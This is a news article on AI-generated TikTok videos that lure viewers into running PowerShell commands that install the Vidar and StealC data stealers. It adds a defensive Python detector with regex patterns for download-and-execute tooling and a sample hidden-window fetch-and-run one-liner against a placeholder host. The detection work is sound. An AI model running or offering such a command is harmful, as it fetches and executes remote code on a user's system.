AI-generated TikTok videos used to spread malware
Cybersecurity experts at Trend Micro are sounding the alarm: hackers now use AI-generated videos on TikTok to spread malicious software that steals personal data.
The scam is fairly straightforward. Attackers create fake tutorial videos that claim to show viewers how to activate Windows or Microsoft Office for free, or unlock premium features in popular apps like Spotify and CapCut. These videos appear slick and convincing, often showing someone opening the Windows Run dialog and typing in a PowerShell command.
But instead of unlocking any features, running the command downloads a harmful script. This script then installs dangerous malware known as Vidar and StealC, which are designed to steal sensitive data. These tools can grab everything from saved passwords and credit card numbers to crypto wallet info, browser cookies, 2FA codes, and even screenshots.
One reason this scheme is effective is TikTok’s recommendation algorithm. It helps these fake tutorials reach massive audiences. One example has already racked up over 500,000 views, 20,000 likes, and 100+ comments.
According to Trend Micro, the videos are nearly identical, with only minor changes like download links or camera angles. The narration is also likely AI-generated, suggesting the entire process is automated.
The way attackers deliver their payload sets this campaign apart from previous malware tricks. In the past, malicious links were placed in video descriptions, comments, or other locations that security tools could often detect. Now, by embedding the attack instructions directly into the video content itself, cybercriminals can avoid detection more easily.
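Because the instruction sits inside the video, the remaining place to catch it is the endpoint, at the moment the viewer runs the command. The Python below is an added example, not code from Trend Micro or the original article: it assumes process-creation events (for example Sysmon Event ID 1) reduced to three hypothetical fields, uses constructed sample commands, and flags PowerShell launches that both download and execute remote content.

```python
import re

# Assumption: process-creation records reduced to three fields;
# the field names are this example's own, not a product schema.
SHELLS = {"powershell.exe", "pwsh.exe"}
FETCH = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
                   r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
EXECUTE = re.compile(r"\b(invoke-expression|iex)\b", re.I)
# Covers the two common spellings only: -w hidden / -WindowStyle Hidden.
HIDDEN = re.compile(r"(?<!\w)-w(indowstyle)?\s+hidden\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def assess(event):
    """Return triage details if a PowerShell launch downloads and runs remote code."""
    if basename(event["image"]) not in SHELLS:
        return None
    cmd = event["command_line"]
    urls = URL.findall(cmd)
    # Require both halves: a download on its own is common in admin scripts.
    if not (urls and FETCH.search(cmd) and EXECUTE.search(cmd)):
        return None
    return {
        "urls": urls,
        "hidden_window": bool(HIDDEN.search(cmd)),
        # Commands typed into the Run dialog start as children of explorer.exe.
        "from_explorer": basename(event["parent_image"]) == "explorer.exe",
    }

def find_pasted_download_commands(events):
    return [(i, f) for i, e in enumerate(events) if (f := assess(e))]

def ev(parent, image, cmd):
    return {"parent_image": parent, "image": image, "command_line": cmd}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events, not taken from the campaign.
SAMPLE_EVENTS = [
    ev(r"C:\Windows\explorer.exe", PS,
       'powershell -w hidden -c "iex (irm https://example.invalid/a.ps1)"'),
    ev(r"C:\Windows\explorer.exe", PS,
       r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    ev(r"C:\Windows\System32\services.exe", PS,
       'powershell.exe -c "Invoke-WebRequest https://example.invalid/agent.msi -OutFile agent.msi"'),
]

if __name__ == "__main__":
    for index, finding in find_pasted_download_commands(SAMPLE_EVENTS):
        print(index, finding)
```

The `from_explorer` and `hidden_window` fields are triage context rather than alert conditions, since shortcuts and other desktop launches also have explorer.exe as parent.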
This development shows how attackers are evolving, using AI and viral platforms like TikTok to reach more people while flying under the radar of traditional security systems.